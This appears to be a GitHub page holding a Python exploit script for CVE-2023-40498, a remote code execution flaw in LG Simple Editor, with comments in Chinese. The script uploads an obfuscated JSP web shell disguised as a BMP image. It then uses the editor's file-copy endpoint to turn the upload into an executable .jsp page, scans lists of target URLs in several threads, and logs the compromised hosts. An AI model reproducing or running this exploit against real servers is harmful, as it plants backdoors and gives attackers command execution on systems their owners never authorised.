-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathLGSimpleEdiotr_CVE-2023-40498_exploit.py
131 lines (104 loc) · 6.49 KB
/
LGSimpleEdiotr_CVE-2023-40498_exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
# 作者: VulnExpo
# 日期: 2023-11-17
import requests
import argparse
import threading
import string
import random
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def generate_random_string(length=5):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for _ in range(length))
def check_for_vulnerability(url, proxies=None, success_file=None):
try:
random_string = generate_random_string()
path1 = "/simpleeditor/imageManager/uploadImage.do"
headers1 = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0',
'Content-Type': 'multipart/form-data; boundary=---------------------------819989449787154297538622041045'}
data1 = """-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile\"; filename=\"{file_name}.bmp\"\r\nContent-Type: image/bmp\r\nContent-Transfer-Encoding: binary\r\n\r\n<%@ page import="java.util.Scanner" pageEncoding="UTF-8" %>
<HTML><title>Just For Fun</title>
<BODY><H3>Build By LandGrey</H3>
<FORM METHOD=POST ACTION='#'> <INPUT name='q' type=text>
<INPUT type=submit value='Fly'>
</FORM><%!
public static String getPicture(String str) throws Exception{{
String fileSeparator =String.valueOf(java.io.File.separatorChar);
if(fileSeparator.equals("\\\\")){{
str = new String(new byte[] {{99, 109, 100, 46, 101, 120, 101, 32, 47, 67, 32}}) + str;
}}else{{
str = new String(new byte[] {{47, 98, 105, 110, 47, 98, 97, 115, 104, 32, 45, 99, 32}}) + str;
}} Class rt = Class.forName(new String(new byte[] {{ 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101 }}));
Process e = (Process) rt.getMethod(new String(new byte[] {{ 101, 120, 101, 99 }}), String.class).invoke(rt.getMethod(new String(new byte[] {{ 103, 101, 116, 82, 117, 110, 116, 105, 109, 101 }})).invoke(null, new Object[]{{}}), new Object[] {{ str }}); Scanner sc = new Scanner(e.getInputStream()).useDelimiter("\\\\A");
String result = ""; result = sc.hasNext() ? sc.next() : result;
sc.close(); return result; }}%><% String name ="Input Nothing"; String query = request.getParameter("q"); if(query != null) {{ name = getPicture(query); }}%><pre><%= name %></pre></BODY></HTML>\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadPath\"\r\n\r\n/\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile_x\"\r\n\r\n-1000\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile_y\"\r\n\r\n-1000\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile_width\"\r\n\r\n1920\r\n-----------------------------819989449787154297538622041045\r\nContent-Disposition: form-data; name=\"uploadFile_height\"\r\n\r\n1080\r\n-----------------------------819989449787154297538622041045--""";
data1 = data1.format(file_name=random_string)
response1 = requests.post(url + path1, data=data1, headers=headers1, verify=False)
if response1.status_code == 200:
path2 = "/simpleeditor/fileSystem/makeDetailContent.do"
data2 = {
"command": "cp",
"option": "-f",
"srcPath": f"/{random_string}_original.bmp",
"destPath": f"/{random_string}.jsp"
}
headers2 = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47',
'X-Requested-With': 'XMLHttpRequest',
'Accept': 'application/json',
'Content-Type': 'application/json'
}
response2 = requests.post(url + path2, json=data2, headers=headers2, verify=False)
if response2.status_code == 200 and "errorMessage" in response2.json() and response2.json()[
"errorMessage"] == "success":
print(f"目标URL: {url}")
print(f"响应内容: {url}/simpleeditor/{random_string}.jsp#")
with open(success_file, 'a') as s_file:
s_file.write(f"++++++++++++++++++\n")
s_file.write(f"目标URL: {url}\n")
s_file.write(f"响应内容: {url}/simpleeditor/{random_string}.jsp#\n\n")
return True
else:
print("第二个请求失败")
return False
else:
print("第一个请求失败")
return False
except Exception as e:
print(f"发生异常:{e}")
return False
def scan_targets(targets, proxies=None, success_file=None):
for target in targets:
target = target.strip()
check_for_vulnerability(target, proxies, success_file)
def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
threads = []
for i in range(num_threads):
thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="LG Simple Editor 远程代码执行CVE-2023-40498")
parser.add_argument("-u", "--url", help="目标URL")
parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4")
parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)")
args = parser.parse_args()
if not args.url and not args.file:
print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
exit(1)
if args.url:
urls = [args.url]
elif args.file:
with open(args.file, 'r') as file:
urls = file.readlines()
success_file = 'success_targets.txt'
proxies = {
"http": args.proxy,
"https": args.proxy
} if args.proxy else None
multi_threaded_scan(urls, proxies, success_file, args.threads)
print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")